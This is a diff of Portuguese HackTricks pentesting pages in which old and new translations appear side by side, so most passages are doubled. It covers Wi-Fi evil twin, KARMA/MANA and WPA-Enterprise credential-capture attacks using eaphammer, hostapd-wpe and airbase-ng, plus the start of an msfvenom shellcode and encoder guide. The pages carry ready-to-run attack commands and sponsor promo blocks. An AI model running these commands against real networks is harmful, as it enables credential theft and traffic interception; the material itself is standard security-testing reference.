iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
```
## Gêmeo Malvado
## Evil Twin
Um ataque de gêmeo malvado é um tipo de ataque Wi-Fi que funciona aproveitando o fato de que a maioria dos computadores e telefones só verá o "nome" ou ESSID de uma rede sem fio (já que a estação base não precisa se autenticar contra o cliente). Isso na verdade torna muito difícil distinguir entre redes com o mesmo nome e o mesmo tipo de criptografia. Na verdade, muitas redes terão vários pontos de acesso que estendem a rede, todos usando o mesmo nome para expandir o acesso sem confundir os usuários.
Um ataque de Evil Twin é um tipo de ataque Wi-Fi que se aproveita do fato de que a maioria dos computadores e telefones só irá ver o "nome" ou ESSID de uma rede sem fio (pois a estação base não precisa se autenticar contra o cliente). Isso na verdade torna muito difícil distinguir entre redes com o mesmo nome e o mesmo tipo de criptografia. Na verdade, muitas redes terão vários pontos de acesso que estendem a rede, todos usando o mesmo nome para expandir o acesso sem confundir os usuários.
Devido à forma como a implementação dos clientes funciona (lembre-se de que o protocolo 802.11 permite que as estações se movam livremente entre pontos de acesso dentro do mesmo ESS), é possível fazer com que um dispositivo mude a estação base à qual está conectado. Isso é possível oferecendo um sinal melhor (o que nem sempre é possível) ou bloqueando o acesso à estação base original (pacotes de desautenticação, interferência ou algum outro tipo de ataque DoS).
Devido à forma como a implementação dos clientes funciona (lembre-se de que o protocolo 802.11 permite que as estações se movam livremente entre os pontos de acesso dentro do mesmo ESS), é possível fazer com que um dispositivo mude a estação base à qual está conectado. Isso é possível oferecendo um sinal melhor (o que nem sempre é possível) ou bloqueando o acesso à estação base original (pacotes de desautenticação, interferência ou algum outro tipo de ataque DoS).
Observe também que as implantações de redes sem fio do mundo real geralmente têm mais de um ponto de acesso, e esses pontos de acesso são frequentemente mais poderosos e têm melhor alcance de linha de visão devido à sua colocação em direção ao teto. Desautenticar um único ponto de acesso geralmente resulta no alvo se movendo para outro ponto de acesso válido em vez do seu AP falso, a menos que todos os pontos de acesso próximos sejam desautenticados (alto) ou você seja muito cuidadoso com a colocação do AP falso (difícil).
Observe também que as implantações de redes sem fio no mundo real geralmente têm mais de um ponto de acesso, e esses pontos de acesso geralmente são mais poderosos e têm melhor alcance de linha de visão devido à sua colocação no teto. Desautenticar um único ponto de acesso geralmente resulta no alvo se movendo para outro ponto de acesso válido em vez do seu AP falso, a menos que todos os pontos de acesso próximos sejam desautenticados (alto) ou você seja muito cuidadoso com a colocação do AP falso (difícil).
Você pode criar um Gêmeo Malvado Aberto muito básico (sem capacidade de rotear tráfego para a Internet) fazendo:
Você pode criar um Evil Twin básico aberto (sem capacidade de rotear tráfego para a Internet) fazendo:
```bash
airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon
```
Você também pode criar um Evil Twin usando o **eaphammer** (observe que para criar Evil Twins com o eaphammer a interface **NÃO DEVE** estar em modo **monitor**):
Você também pode criar um Evil Twin usando o **eaphammer** (observe que para criar evil twins com o eaphammer, a interface **NÃO DEVE ESTAR** no modo **monitor**):
```
./eaphammer -i wlan0 --essid exampleCorp --captive-portal
```
@ -557,32 +632,32 @@ Ou usando o Airgeddon: `Opções: 5,6,7,8,9 (dentro do menu de ataque Evil Twin)
![](<../../.gitbook/assets/image (148).png>)
Por favor, observe que por padrão, se um ESSID na PNL for salvo como protegido por WPA, o dispositivo não se conectará automaticamente a um Evil Twin aberto. Você pode tentar DoS o AP real e esperar que o usuário se conecte manualmente ao seu Evil Twin aberto, ou pode DoS o AP real e usar um WPA Evil Twin para capturar o handshake (usando este método, você não poderá deixar a vítima se conectar a você, pois não sabe o PSK, mas pode capturar o handshake e tentar quebrá-lo).
Por favor, observe que por padrão, se um ESSID na PNL estiver salvo como protegido por WPA, o dispositivo não se conectará automaticamente a um Evil Twin aberto. Você pode tentar fazer um DoS no AP real e esperar que o usuário se conecte manualmente ao seu Evil Twin aberto, ou você pode fazer um DoS no AP real e usar um Evil Twin com WPA para capturar o handshake (usando esse método, você não poderá permitir que a vítima se conecte a você, pois você não conhece a PSK, mas pode capturar o handshake e tentar quebrá-lo).
_Alguns sistemas operacionais e antivírus avisarão o usuário que se conectar a uma rede aberta é perigoso..._
_Alguns sistemas operacionais e antivírus avisarão o usuário de que se conectar a uma rede aberta é perigoso..._
### WPA/WPA2 Evil Twin
### Evil Twin WPA/WPA2
Você pode criar um **Evil Twin usando WPA/2** e se os dispositivos estiverem configurados para se conectar a esse SSID com WPA/2, eles tentarão se conectar. De qualquer forma, **para completar o handshake de 4 vias**, você também precisa **saber** a **senha** que o cliente vai usar. Se você **não sabe**, a **conexão não será concluída**.
Você pode criar um **Evil Twin usando WPA/2** e se os dispositivos estiverem configurados para se conectar a esse SSID com WPA/2, eles tentarão se conectar. No entanto, **para completar o handshake de 4 vias**, você também precisa **saber** a **senha** que o cliente vai usar. Se você **não souber**, a **conexão não será concluída**.
```
./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"
```
### Evil Twin Empresarial
Para entender esses ataques, recomenda-se ler antes a breve explicação sobre [WPA Enterprise](./#wpa-enterprise-mgt).
Para entender esses ataques, recomendo ler antes a breve explicação sobre [WPA Enterprise](./#wpa-enterprise-mgt).
**Usando o hostapd-wpe**
O `hostapd-wpe` precisa de um arquivo de **configuração** para funcionar. Para **automatizar** a geração dessas configurações, você pode usar [https://github.com/WJDigby/apd\_launchpad](https://github.com/WJDigby/apd\_launchpad) (baixe o arquivo python dentro de _/etc/hostapd-wpe/_).
O `hostapd-wpe` precisa de um arquivo de **configuração** para funcionar. Para **automatizar** a geração dessas configurações, você pode usar [https://github.com/WJDigby/apd\_launchpad](https://github.com/WJDigby/apd\_launchpad) (faça o download do arquivo python dentro de _/etc/hostapd-wpe/_)
```
./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s
```
No arquivo de configuração, você pode selecionar muitas coisas diferentes, como ssid, canal, arquivos de usuário, credenciais/chave, parâmetros dh, versão wpa e autenticação...
No arquivo de configuração, você pode selecionar várias coisas diferentes, como ssid, canal, arquivos de usuário, credenciais/chave, parâmetros dh, versão wpa e autenticação...
[**Usando hostapd-wpe com EAP-TLS para permitir que qualquer certificado faça login.**](evil-twin-eap-tls.md)
[**Usando o hostapd-wpe com EAP-TLS para permitir qualquer certificado para fazer login.**](evil-twin-eap-tls.md)
**Usando EAPHammer**
**Usando o EAPHammer**
```bash
# Generate Certificates
./eaphammer --cert-wizard
@ -590,7 +665,7 @@ No arquivo de configuração, você pode selecionar muitas coisas diferentes, co
# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds
```
Por padrão, o EAPHammer utiliza os seguintes métodos de autenticação (observe que o GTC é o primeiro a ser utilizado para obter senhas em texto plano e, em seguida, são utilizados métodos de autenticação mais robustos):
Por padrão, o EAPHammer utiliza os seguintes métodos de autenticação (observe que o GTC é o primeiro a ser utilizado para obter senhas em texto simples e, em seguida, são utilizados métodos de autenticação mais robustos):
```
GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5
```
@ -602,31 +677,31 @@ Ou você também pode usar:
* `--negotiate gtc-downgrade` para usar uma implementação de downgrade GTC altamente eficiente (senhas em texto simples)
* `--negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP` para especificar manualmente os métodos oferecidos (oferecer os mesmos métodos de autenticação na mesma ordem que a organização tornará o ataque muito mais difícil de detectar).
* [Encontre mais informações na wiki](http://solstice.sh/wireless/eaphammer/2019/09/10/eap-downgrade-attacks/)
* [Encontre mais informações no wiki](http://solstice.sh/wireless/eaphammer/2019/09/10/eap-downgrade-attacks/)
**Usando Airgeddon**
**Usando o Airgeddon**
`Airgeddon` pode usar certificados previamente gerados para oferecer autenticação EAP a redes WPA/WPA2-Enterprise. A rede falsa fará o downgrade do protocolo de conexão para EAP-MD5, para que possa **capturar o usuário e o MD5 da senha**. Mais tarde, o atacante pode tentar quebrar a senha.\
`Airgeddon` pode usar certificados previamente gerados para oferecer autenticação EAP a redes WPA/WPA2-Enterprise. A rede falsa irá rebaixar o protocolo de conexão para EAP-MD5, para que seja possível **capturar o usuário e o MD5 da senha**. Posteriormente, o atacante pode tentar quebrar a senha.\
`Airggedon` oferece a possibilidade de um **ataque Evil Twin contínuo (ruidoso)** ou **apenas criar o ataque Evil até que alguém se conecte (suave).**
![](<../../.gitbook/assets/image (129).png>)
### Depuração de túneis TLS PEAP e EAP-TTLS em ataques Evil Twins
### Depurando túneis TLS PEAP e EAP-TTLS em ataques Evil Twins
_Este método foi testado em uma conexão PEAP, mas como estou descriptografando um túnel TLS arbitrário, isso também deve funcionar com EAP-TTLS_
Dentro da **configuração** do _hostapd-wpe_, **comente** a linha que contém _**dh\_file**_ (de `dh_file=/etc/hostapd-wpe/certs/dh` para `#dh_file=/etc/hostapd-wpe/certs/dh`)\
Isso fará com que o `hostapd-wpe` **troque chaves usando RSA** em vez de DH, para que você possa **descriptografar** o tráfego posteriormente **conhecendo a chave privada do servidor**.
Isso fará com que o `hostapd-wpe` **troque chaves usando RSA** em vez de DH, para que você possa **descriptografar** o tráfego posteriormente, **conhecendo a chave privada do servidor**.
Agora inicie o **Evil Twin** usando **`hostapd-wpe`** com essa configuração modificada como de costume. Além disso, inicie o **`wireshark`** na **interface** que está realizando o ataque Evil Twin.
Agora inicie o **Evil Twin** usando o **`hostapd-wpe`** com essa configuração modificada como de costume. Também inicie o **`wireshark`** na **interface** que está realizando o ataque Evil Twin.
Agora ou mais tarde (quando você já capturou algumas intenções de autenticação), você pode adicionar a chave privada RSA ao wireshark em: `Editar --> Preferências --> Protocolos --> TLS --> (Lista de chaves RSA) Editar...`
Agora ou mais tarde (quando você já tiver capturado algumas tentativas de autenticação), você pode adicionar a chave privada RSA ao wireshark em: `Editar --> Preferências --> Protocolos --> TLS --> (Lista de chaves RSA) Editar...`
Adicione uma nova entrada e preencha o formulário com estes valores: **Endereço IP = qualquer** -- **Porta = 0** -- **Protocolo = dados** -- **Arquivo de chave** (**selecione seu arquivo de chave**, para evitar problemas, selecione um arquivo de chave **sem proteção por senha**).
Adicione uma nova entrada e preencha o formulário com os seguintes valores: **Endereço IP = qualquer** -- **Porta = 0** -- **Protocolo = dados** -- **Arquivo de chave** (**selecione seu arquivo de chave**, para evitar problemas, selecione um arquivo de chave **sem proteção por senha**).
![](<../../.gitbook/assets/image (151).png>)
E olhe para a nova **aba "TLS descriptografado"**:
E observe a nova aba **"TLS Descriptografado"**:
![](<../../.gitbook/assets/image (152).png>)
@ -634,7 +709,7 @@ E olhe para a nova **aba "TLS descriptografado"**:
### Listas negras e brancas de ESSID e MAC
A tabela a seguir lista os diferentes tipos de MFACLs (Listas de Controle de Acesso de Quadros de Gerenciamento) disponíveis, bem como seus efeitos quando usados:
A tabela a seguir lista os diferentes tipos de MFACLs (Listas de Controle de Acesso a Quadros de Gerenciamento) disponíveis, bem como seus efeitos quando usados:
![](<../../.gitbook/assets/image (149).png>)
```
@ -660,55 +735,54 @@ pears
```
### KARMA
Os ataques Karma são uma segunda forma de ataque de ponto de acesso falso que explora o processo de seleção de rede usado pelas estações. Em um whitepaper escrito em 2005, Dino Dai Zovi e Shane Macaulay descrevem como um atacante pode configurar um ponto de acesso para ouvir solicitações de sonda direcionadas e responder a todas elas com respostas de sonda direcionadas correspondentes. Isso faz com que as estações afetadas enviem automaticamente uma solicitação de associação ao ponto de acesso do atacante. O ponto de acesso então responde com uma resposta de associação, fazendo com que as estações afetadas se conectem ao atacante.
Os ataques Karma são uma segunda forma de ataque de ponto de acesso falso que explora o processo de seleção de rede usado pelas estações. Em um whitepaper escrito em 2005, Dino Dai Zovi e Shane Macaulay descrevem como um atacante pode configurar um ponto de acesso para ouvir solicitações de sonda direcionadas e responder a todas elas com respostas de sonda direcionadas correspondentes. Isso faz com que as estações afetadas enviem automaticamente uma solicitação de associação para o ponto de acesso do atacante. O ponto de acesso então responde com uma resposta de associação, fazendo com que as estações afetadas se conectem ao atacante.
### MANA
De acordo com Ian de Villiers e Dominic White, as estações modernas são projetadas para se proteger contra ataques Karma ignorando respostas de sonda direcionadas de pontos de acesso que ainda não responderam a pelo menos uma solicitação de sonda de transmissão. Isso levou a uma queda significativa no número de estações que eram vulneráveis a ataques Karma até 2015, quando White e de Villiers desenvolveram um meio de contornar tais proteções. No aprimorado ataque Karma de White e de Villiers (ataque MANA), as respostas de sonda direcionadas são usadas para reconstruir as PNLs das estações próximas. Quando uma solicitação de sonda de transmissão é recebida de uma estação, o ponto de acesso do atacante responde com um SSID arbitrário da PNL da estação que já foi vista em uma sonda direta desse dispositivo.
De acordo com Ian de Villiers e Dominic White, as estações modernas são projetadas para se proteger contra ataques Karma, ignorando respostas de sonda direcionadas de pontos de acesso que ainda não responderam a pelo menos uma solicitação de sonda de transmissão. Isso levou a uma queda significativa no número de estações vulneráveis a ataques Karma até 2015, quando White e de Villiers desenvolveram um meio de contornar tais proteções. No aprimoramento do ataque Karma de White e de Villiers (ataque MANA), as respostas de sonda direcionadas são usadas para reconstruir as PNLs das estações próximas. Quando uma solicitação de sonda de transmissão é recebida de uma estação, o ponto de acesso do atacante responde com um SSID arbitrário da PNL da estação que já foi visto em uma sonda direcionada desse dispositivo.
Em resumo, o algoritmo MANA funciona da seguinte maneira: cada vez que o ponto de acesso recebe uma solicitação de sonda, ele primeiro determina se é uma sonda de transmissão ou direcionada. Se for uma sonda direcionada, o endereço MAC do remetente é adicionado à tabela de hash (se ainda não estiver lá) e o ESSID é adicionado à PNL desse dispositivo. O ponto de acesso então responde com uma resposta de sonda direcionada. Se for uma sonda de transmissão, o ponto de acesso responde com respostas de sonda para cada uma das redes na PNL desse dispositivo.
Resumindo, o algoritmo MANA funciona da seguinte maneira: cada vez que o ponto de acesso recebe uma solicitação de sonda, ele primeiro determina se é uma sonda de transmissão ou direcionada. Se for uma sonda direcionada, o endereço MAC do remetente é adicionado à tabela de hash (se ainda não estiver lá) e o ESSID é adicionado à PNL desse dispositivo. O ponto de acesso então responde com uma resposta de sonda direcionada. Se for uma sonda de transmissão, o ponto de acesso responde com respostas de sonda para cada uma das redes na PNL desse dispositivo.
Ataque MANA usando eaphammer:
Ataque MANA usando o eaphammer:
```
./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]
```
### Ataque Loud MANA
Observe que o ataque MANA padrão ainda não nos permite atacar dispositivos que não usam sondagem direcionada. Portanto, se também não conhecemos previamente nenhuma entrada dentro do PNL do dispositivo, precisamos descobrir alguma outra maneira de atacá-lo.
Observe que o ataque MANA padrão ainda não nos permite atacar dispositivos que não usam sondagem direcionada. Portanto, se também não conhecemos previamente nenhuma entrada dentro do PNL do dispositivo, precisamos encontrar outra maneira de atacá-lo.
Uma possibilidade é o que é chamado de ataque Loud MANA. Esse ataque se baseia na ideia de que dispositivos clientes em proximidade física próxima provavelmente têm pelo menos algumas entradas em comum em seus PNLs.
Em resumo, o ataque Loud MANA, em vez de responder a solicitações de sondagem com cada ESSID em um determinado PNL do dispositivo, o AP falso envia respostas de sondagem para cada ESSID em todos os PNLs de todos os dispositivos que ele já viu antes. Relacionando isso à teoria dos conjuntos, podemos dizer que o AP envia respostas de sondagem para cada ESSID na união de todos os PNLs de dispositivos próximos.
Resumidamente, o ataque Loud MANA, em vez de responder às solicitações de sondagem com cada ESSID no PNL de um dispositivo específico, o AP falso envia respostas de sondagem para cada ESSID em todos os PNLs de todos os dispositivos que ele já viu antes. Relacionando isso à teoria dos conjuntos, podemos dizer que o AP envia respostas de sondagem para cada ESSID na união de todos os PNLs dos dispositivos próximos.
```
./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]
```
### Ataque de Beacon Conhecido
### Ataque Beacon Conhecido
Ainda existem casos em que o ataque Loud MANA não terá sucesso. O ataque de Beacon Conhecido é uma forma de "Força Bruta" ESSIDs para tentar fazer com que a vítima se conecte ao atacante. O atacante cria um AP que responde a qualquer ESSID e executa algum código enviando beacons falsificando ESSIDs de cada nome dentro de uma lista de palavras. Com sorte, a vítima conterá alguns desses nomes de ESSID dentro de sua PNL e tentará se conectar ao AP falso.\
O Eaphammer implementou este ataque como um ataque MANA onde todos os ESSIDs dentro de uma lista são carregados (você também pode combinar isso com `--loud` para criar um ataque Loud MANA + Beacon Conhecido):
Ainda existem casos em que o ataque Loud MANA não terá sucesso. O ataque Beacon Conhecido é uma forma de "Força Bruta" de ESSIDs para tentar fazer com que a vítima se conecte ao atacante. O atacante cria um AP que responde a qualquer ESSID e executa algum código enviando beacons falsificando ESSIDs de cada nome dentro de uma lista de palavras. Esperançosamente, a vítima contém alguns desses nomes de ESSID em sua PNL e tentará se conectar ao AP falso. O Eaphammer implementou esse ataque como um ataque MANA, onde todos os ESSIDs dentro de uma lista são carregados (você também pode combinar isso com `--loud` para criar um ataque Loud MANA + Beacon Conhecido):
```
./eaphammer -i wlan0 --mana [--loud] --known-beacons --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]
```
**Ataque de Burst de Beacon Conhecido**
**Ataque de Beacon Burst conhecido**
Como os beacons conhecidos são altos, você pode usar um script dentro do projeto Eaphammer para lançar rapidamente beacons de cada nome de ESSID dentro de um arquivo. Se você combinar esse script com um ataque MANA do Eaphammer, os clientes poderão se conectar ao seu AP.
Como os beacons conhecidos são chamativos. Você pode usar um script dentro do projeto Eaphammer para lançar rapidamente beacons com o nome de cada ESSID em um arquivo. Se você combinar esse script com um ataque MANA do Eaphammer, os clientes poderão se conectar ao seu AP.
```
# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5
```
## Wi-Fi Direct
O Wi-Fi Direct é um padrão Wi-Fi que permite que dispositivos se conectem entre si sem um AP sem fio, pois um dos dois dispositivos atuará como AP (chamado de proprietário do grupo). Você pode encontrar o Wi-Fi Direct em muitos dispositivos IoT como impressoras, TVs...
O Wi-Fi Direct é um padrão de Wi-Fi que permite que dispositivos se conectem entre si sem um ponto de acesso sem fio, pois um dos dois dispositivos atuará como AP (chamado de proprietário do grupo). Você pode encontrar o Wi-Fi Direct em muitos dispositivos IoT, como impressoras, TVs...
O Wi-Fi Direct depende do Wi-Fi Protected Setup (**WPS**) para conectar os dispositivos com segurança. O WPS possui vários métodos de configuração, como **Push-Button** Configuration (PBC), **PIN entry** e **Near-Field** Communication (NFC).
O Wi-Fi Direct depende do Wi-Fi Protected Setup (WPS) para conectar os dispositivos com segurança. O WPS possui vários métodos de configuração, como Configuração por Botão de Pressão (PBC), entrada de PIN e Comunicação de Campo Próximo (NFC).
Portanto, os ataques anteriormente vistos ao PIN do WPS também são válidos aqui se o PIN for usado.
### EvilDirect Hijacking
### Sequestro do EvilDirect
Isso funciona como um Evil-Twin, mas para o Wi-Fi Direct, você pode se passar por um proprietário de grupo para tentar fazer com que outros dispositivos, como telefones, se conectem a você: `airbase-ng -c 6 -e DIRECT-5x-BRAVIA -a BB:BB:BB:BB:BB:BB mon0`
@ -725,24 +799,31 @@ Isso funciona como um Evil-Twin, mas para o Wi-Fi Direct, você pode se passar p
TODO: Dê uma olhada em [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login com Facebook e imitação de WPA em portais cativos)
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Siga o HackenProof**](https://bit.ly/3xrrDrL) **para aprender mais sobre bugs web3**
**HackenProof é o lar de todas as recompensas por bugs de criptografia.**
🐞 Leia tutoriais de bugs web3
**Seja recompensado sem atrasos**\
As recompensas do HackenProof são lançadas apenas quando seus clientes depositam o orçamento de recompensa. Você receberá a recompensa após a verificação do bug.
🔔 Receba notificações sobre novas recompensas por bugs
**Adquira experiência em pentesting web3**\
Protocolos de blockchain e contratos inteligentes são a nova Internet! Domine a segurança web3 em seus dias de ascensão.
💬 Participe de discussões na comunidade
**Torne-se a lenda do hacker web3**\
Ganhe pontos de reputação com cada bug verificado e conquiste o topo do leaderboard semanal.
[**Cadastre-se no HackenProof**](https://hackenproof.com/register) comece a ganhar com seus hacks!
{% embed url="https://hackenproof.com/register" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? Ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga** me no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas dicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas dicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

515
generic-methodologies-and-resources/shells/msfvenom.md
View file

@ -4,27 +4,36 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Siga HackenProof**](https://bit.ly/3xrrDrL) **para aprender mais sobre bugs web3**
**HackenProof é o lar de todas as recompensas por bugs de criptografia.**
🐞 Leia tutoriais de bugs web3
**Seja recompensado sem atrasos**\
As recompensas do HackenProof são lançadas apenas quando seus clientes depositam o orçamento de recompensa. Você receberá a recompensa após a verificação do bug.
🔔 Receba notificações sobre novos programas de recompensa por bugs
**Adquira experiência em pentesting web3**\
Protocolos blockchain e contratos inteligentes são a nova Internet! Domine a segurança web3 em seus dias de ascensão.
💬 Participe de discussões na comunidade
**Torne-se a lenda do hacker web3**\
Ganhe pontos de reputação com cada bug verificado e conquiste o topo do leaderboard semanal.
[**Cadastre-se no HackenProof**](https://hackenproof.com/register) comece a ganhar com seus hacks!
{% embed url="https://hackenproof.com/register" %}
---
`msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>`
Também é possível usar `-a` para especificar a arquitetura ou `--platform`.
Também é possível usar o `-a` para especificar a arquitetura ou a `--platform`
## Listagem
```bash
@ -33,135 +42,323 @@ msfvenom -l encoders #Encoders
```
## Parâmetros comuns ao criar um shellcode
### `-p` ou `--payload`
Ao criar um shellcode, existem alguns parâmetros comuns que podem ser utilizados para personalizar o código gerado. Esses parâmetros permitem que você defina o tipo de payload, a arquitetura do sistema alvo, o formato de saída e outras opções relevantes. Abaixo estão alguns dos parâmetros mais comuns:
O parâmetro `-p` ou `--payload` é usado para especificar o payload que será usado para gerar o shellcode. O Metasploit Framework oferece uma ampla variedade de payloads para escolher, incluindo payloads para diferentes sistemas operacionais e arquiteturas.
- **Payload**: Especifica o tipo de payload que será usado no shellcode, como um shell reverso ou um payload de execução de comandos.
- **Arquitetura**: Define a arquitetura do sistema alvo, como x86, x64 ou ARM.
- **Formato de saída**: Determina o formato de saída do shellcode, como raw, exe, elf ou macho.
- **Bad characters**: Permite especificar caracteres que devem ser evitados no shellcode, como caracteres nulos ou caracteres que podem causar problemas de codificação.
- **Encoder**: Define o encoder a ser usado para ofuscar o shellcode e evitar detecção, como o encoder XOR ou o encoder Shikata Ga Nai.
- **Tamanho**: Especifica o tamanho máximo do shellcode gerado.
- **Endereço de retorno**: Define o endereço de retorno para o shellcode, geralmente usado em ataques de estouro de buffer.
### `-f` ou `--format`
O parâmetro `-f` ou `--format` é usado para especificar o formato de saída do shellcode. O Metasploit Framework suporta vários formatos de saída, incluindo `c`, `python`, `ruby`, `raw`, `exe`, `elf`, `dll` e muitos outros.
### `-e` ou `--encoder`
O parâmetro `-e` ou `--encoder` é usado para especificar o encoder que será usado para ofuscar o payload. O Metasploit Framework oferece vários encoders para escolher, incluindo encoders que podem ajudar a evitar a detecção de antivírus.
### `-b` ou `--bad-chars`
O parâmetro `-b` ou `--bad-chars` é usado para especificar caracteres que não devem estar presentes no shellcode gerado. Isso é útil para evitar problemas de codificação que podem fazer com que o shellcode falhe.
### `-a` ou `--arch`
O parâmetro `-a` ou `--arch` é usado para especificar a arquitetura do sistema de destino. O Metasploit Framework suporta várias arquiteturas, incluindo `x86`, `x64`, `armle`, `aarch64` e outras.
### `-s` ou `--space`
O parâmetro `-s` ou `--space` é usado para especificar o tamanho do espaço disponível para o shellcode. Isso é útil para garantir que o shellcode gerado caiba no espaço disponível na memória do sistema de destino.
Esses parâmetros podem ser ajustados de acordo com as necessidades específicas do seu teste de penetração, permitindo que você crie um shellcode personalizado e eficaz para explorar vulnerabilidades em sistemas alvo.
```bash
-b "\x00\x0a\x0d"
-f c
-e x86/shikata_ga_nai -i 5
-b "\x00\x0a\x0d"
-f c
-e x86/shikata_ga_nai -i 5
EXITFUNC=thread
PrependSetuid=True #Use this to create a shellcode that will execute something with SUID
```
## **Windows**
